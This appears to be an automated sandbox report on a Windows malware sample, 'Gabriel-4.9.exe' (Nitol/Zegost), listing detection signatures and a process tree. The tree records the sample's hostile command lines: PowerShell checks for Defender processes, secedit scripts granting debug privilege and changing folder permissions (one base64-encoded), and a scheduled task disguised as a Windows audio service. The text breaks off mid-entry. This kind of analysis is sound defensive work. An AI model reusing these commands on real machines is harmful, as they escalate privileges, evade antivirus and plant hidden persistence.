Edit tour
Windows
Analysis Report
Gabriel-4.9.exe
Overview
General Information
Detection
Nitol, Zegost
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nitol
Yara detected Zegost
AI detected suspicious sample
Contains functionality to capture and log keystrokes
Contains functionality to modify Windows User Account Control (UAC) settings
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- Gabriel-4.9.exe (PID: 2548 cmdline:
"C:\Users\ user\Deskt op\Gabriel -4.9.exe" MD5: DB868A34EDC41156E9AEED55EA44BA97) - irsetup.exe (PID: 3220 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\_ir_sf _temp_0\ir setup.exe" __IRAOFF: 5572466 "_ _IRAFN:C:\ Users\user \Desktop\G abriel-4.9 .exe" "__I RCT:0" "__ IRTSS:0" " __IRSID:S- 1-5-21-224 6122658-36 93405117-2 476756634- 1003" MD5: 2A7D5F8D3FB4AB753B226FD88D31453B) - powershell.exe (PID: 5068 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"msmpen g.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7152 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"securi tyhealthsy stray.exe\ ")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1616 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"mpcopy accelerato r.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5276 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MpDefe nderCoreSe rvice.exe\ ")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4924 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5720 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $mypid=(Ge t-WmiObjec t -Query ' select Par entProcess Id from Wi n32_Proces s where Pr ocessId=32 20').Paren tProcessId ;if($mypid ){Stop-Pro cess -Id $ mypid -For ce;} MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1492 cmdline:
"C:\Window s\System32 \cmd.exe" /c start " title" "C: \Users\Pub lic\Docume nts\UfHE8O B\MTGHu7b. exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5648 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - MTGHu7b.exe (PID: 424 cmdline:
"C:\Users\ Public\Doc uments\UfH E8OB\MTGHu 7b.exe" MD5: 22AF53F40D27C913642C0572C73A5D87) - powershell.exe (PID: 5852 cmdline:
powershell .exe -NoPr ofile -C " Set-Conten t -Value @ ('[Unicode ]','Unicod e=yes','[V ersion]',' signature= \"$CHICAGO $\"','Revi sion=1','[ Privilege Rights]',' SeDebugPri vilege = * S-1-5-18', '[File Sec urity]','\ "C:\Progra mData\Prog ram\",0,\" D:AR(D;OIC I;DTSDRCWD ;;;WD)\"') -Path ([I O.Path]::C ombine($en v:TEMP, 'S eDebugPriv ilege1.inf ')) -Encod ing Unicod e; secedit .exe /conf igure /db ([IO.Path] ::Combine( $env:TEMP, 'SeDebugP rivilege1. sdb')) /cf g ([IO.Pat h]::Combin e($env:TEM P, 'SeDebu gPrivilege 1.inf')) / overwrite /log ([IO. Path]::Com bine($env: TEMP, 'SeD ebugPrivil ege1.log') ) /quiet; Remove-Ite m -Path ([ IO.Path]:: Combine($e nv:TEMP, ' SeDebugPri vilege1.*' )) -Force; " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5260 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - SecEdit.exe (PID: 3652 cmdline:
"C:\Window s\system32 \SecEdit.e xe" /confi gure /db C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege1. sdb /cfg C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege1. inf /overw rite /log C:\Users\u ser\AppDat a\Local\Te mp\SeDebug Privilege1 .log /quie t MD5: BFC13856291E4B804D33BBAEFC8CB3B5) - powershell.exe (PID: 3688 cmdline:
powershell .exe -NoPr ofile -C " Set-Conten t -Value @ ('[Unicode ]','Unicod e=yes','[V ersion]',' signature= \"$CHICAGO $\"','Revi sion=1','[ Privilege Rights]',' SeDebugPri vilege = * S-1-5-18', '[File Sec urity]','\ "C:\Progra mData\Data \",0,\"D:A R(D;OICI;D TSDRCWD;;; WD)\"') -P ath ([IO.P ath]::Comb ine($env:T EMP, 'SeDe bugPrivile ge3.inf')) -Encoding Unicode; secedit.ex e /configu re /db ([I O.Path]::C ombine($en v:TEMP, 'S eDebugPriv ilege3.sdb ')) /cfg ( [IO.Path]: :Combine($ env:TEMP, 'SeDebugPr ivilege3.i nf')) /ove rwrite /lo g ([IO.Pat h]::Combin e($env:TEM P, 'SeDebu gPrivilege 3.log')) / quiet; Rem ove-Item - Path ([IO. Path]::Com bine($env: TEMP, 'SeD ebugPrivil ege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1456 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - SecEdit.exe (PID: 5204 cmdline:
"C:\Window s\system32 \SecEdit.e xe" /confi gure /db C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege3. sdb /cfg C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege3. inf /overw rite /log C:\Users\u ser\AppDat a\Local\Te mp\SeDebug Privilege3 .log /quie t MD5: BFC13856291E4B804D33BBAEFC8CB3B5) - powershell.exe (PID: 3472 cmdline:
powershell .exe -NoPr ofile -C " [IO.File]: :WriteAllB ytes([IO.P ath]::Comb ine($env:T EMP, 'SeDe bugPrivile ge4.inf'), [Convert] ::FromBase 64String(' //5bAFUAbg BpAGMAbwBk AGUAXQANAA oAVQBuAGkA YwBvAGQAZQ A9AHkAZQBz AA0ACgBbAF YAZQByAHMA aQBvAG4AXQ ANAAoAcwBp AGcAbgBhAH QAdQByAGUA PQAiACQAQw BIAEkAQwBB AEcATwAkAC IADQAKAFIA ZQB2AGkAcw BpAG8AbgA9 ADEADQAKAF sAUAByAGkA dgBpAGwAZQ BnAGUAIABS AGkAZwBoAH QAcwBdAA0A CgBTAGUARA BlAGIAdQBn AFAAcgBpAH YAaQBsAGUA ZwBlACAAPQ AgACoAUwAt ADEALQA1AC 0AMQA4AA0A CgA=')); s ecedit.exe /configur e /db ([IO .Path]::Co mbine($env :TEMP, 'Se DebugPrivi lege4.sdb' )) /cfg ([ IO.Path]:: Combine($e nv:TEMP, ' SeDebugPri vilege4.in f')) /over write /log ([IO.Path ]::Combine ($env:TEMP , 'SeDebug Privilege4 .log')) /q uiet; Remo ve-Item -P ath ([IO.P ath]::Comb ine($env:T EMP, 'SeDe bugPrivile ge4.*')) - Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5292 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - SecEdit.exe (PID: 7132 cmdline:
"C:\Window s\system32 \SecEdit.e xe" /confi gure /db C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege4. sdb /cfg C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege4. inf /overw rite /log C:\Users\u ser\AppDat a\Local\Te mp\SeDebug Privilege4 .log /quie t MD5: BFC13856291E4B804D33BBAEFC8CB3B5) - powershell.exe (PID: 7092 cmdline:
powershell .exe -NoPr ofile -C " Set-Conten t -Value @ ('[Unicode ]','Unicod e=yes','[V ersion]',' signature= \"$CHICAGO $\"','Revi sion=1','[ Privilege Rights]',' SeDebugPri vilege = * S-1-5-18', '[File Sec urity]','\ "C:\Progra mData\Prog ram\",0,\" D:AR(D;OIC I;DTSDRCWD ;;;WD)\"') -Path ([I O.Path]::C ombine($en v:TEMP, 'S eDebugPriv ilege1.inf ')) -Encod ing Unicod e; secedit .exe /conf igure /db ([IO.Path] ::Combine( $env:TEMP, 'SeDebugP rivilege1. sdb')) /cf g ([IO.Pat h]::Combin e($env:TEM P, 'SeDebu gPrivilege 1.inf')) / overwrite /log ([IO. Path]::Com bine($env: TEMP, 'SeD ebugPrivil ege1.log') ) /quiet; Remove-Ite m -Path ([ IO.Path]:: Combine($e nv:TEMP, ' SeDebugPri vilege1.*' )) -Force; " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 3476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - SecEdit.exe (PID: 4132 cmdline:
"C:\Window s\system32 \SecEdit.e xe" /confi gure /db C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege1. sdb /cfg C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege1. inf /overw rite /log C:\Users\u ser\AppDat a\Local\Te mp\SeDebug Privilege1 .log /quie t MD5: BFC13856291E4B804D33BBAEFC8CB3B5) - cmd.exe (PID: 1220 cmdline:
cmd /c ech o.>c:\inst .ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7196 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7252 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - powershell.exe (PID: 7268 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7280 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7516 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7524 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7904 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7912 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4020 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7348 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2364 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6752 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7580 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6276 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6272 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5852 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1616 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7972 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7944 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2328 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5560 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5320 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2728 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7304 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7280 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7268 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1388 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4592 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3944 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3260 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1032 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1112 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3664 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5836 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7808 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6444 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 572 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7940 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5424 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4256 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 988 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7392 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7368 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6108 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5240 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1472 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MTGHu7 b.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7512 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rundll32.exe (PID: 6336 cmdline:
C:\Windows \System32\ rundll32.e xe C:\Wind ows\System 32\shell32 .dll,SHCre ateLocalSe rverRunDll {9aa46009 -3ce0-458a -a354-7156 10a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
- iusb3mon.exe (PID: 4144 cmdline:
C:\Program Data\progr am\iusb3mo n.exe MD5: 22AF53F40D27C913642C0572C73A5D87) - powershell.exe (PID: 7696 cmdline:
powershell .exe -NoPr ofile -C " Set-Conten t -Value @ ('[Unicode ]','Unicod e=yes','[V ersion]',' signature= \"$CHICAGO $\"','Revi sion=1','[ Privilege Rights]',' SeDebugPri vilege = * S-1-5-18', '[File Sec urity]','\ "C:\Progra mData\Prog ram\",0,\" D:AR(D;OIC I;DTSDRCWD ;;;WD)\"') -Path ([I O.Path]::C ombine($en v:TEMP, 'S eDebugPriv ilege1.inf ')) -Encod ing Unicod e; secedit .exe /conf igure /db ([IO.Path] ::Combine( $env:TEMP, 'SeDebugP rivilege1. sdb')) /cf g ([IO.Pat h]::Combin e($env:TEM P, 'SeDebu gPrivilege 1.inf')) / overwrite /log ([IO. Path]::Com bine($env: TEMP, 'SeD ebugPrivil ege1.log') ) /quiet; Remove-Ite m -Path ([ IO.Path]:: Combine($e nv:TEMP, ' SeDebugPri vilege1.*' )) -Force; " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7712 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - SecEdit.exe (PID: 8176 cmdline:
"C:\Window s\system32 \SecEdit.e xe" /confi gure /db C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege1. sdb /cfg C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege1. inf /overw rite /log C:\Users\u ser\AppDat a\Local\Te mp\SeDebug Privilege1 .log /quie t MD5: BFC13856291E4B804D33BBAEFC8CB3B5) - powershell.exe (PID: 7704 cmdline:
powershell .exe -NoPr ofile -C " Set-Conten t -Value @ ('[Unicode ]','Unicod e=yes','[V ersion]',' signature= \"$CHICAGO $\"','Revi sion=1','[ Privilege Rights]',' SeDebugPri vilege = * S-1-5-18', '[File Sec urity]','\ "C:\Progra mData\Data \",0,\"D:A R(D;OICI;D TSDRCWD;;; WD)\"') -P ath ([IO.P ath]::Comb ine($env:T EMP, 'SeDe bugPrivile ge3.inf')) -Encoding Unicode; secedit.ex e /configu re /db ([I O.Path]::C ombine($en v:TEMP, 'S eDebugPriv ilege3.sdb ')) /cfg ( [IO.Path]: :Combine($ env:TEMP, 'SeDebugPr ivilege3.i nf')) /ove rwrite /lo g ([IO.Pat h]::Combin e($env:TEM P, 'SeDebu gPrivilege 3.log')) / quiet; Rem ove-Item - Path ([IO. Path]::Com bine($env: TEMP, 'SeD ebugPrivil ege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7728 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - SecEdit.exe (PID: 8184 cmdline:
"C:\Window s\system32 \SecEdit.e xe" /confi gure /db C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege3. sdb /cfg C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege3. inf /overw rite /log C:\Users\u ser\AppDat a\Local\Te mp\SeDebug Privilege3 .log /quie t MD5: BFC13856291E4B804D33BBAEFC8CB3B5) - powershell.exe (PID: 7720 cmdline:
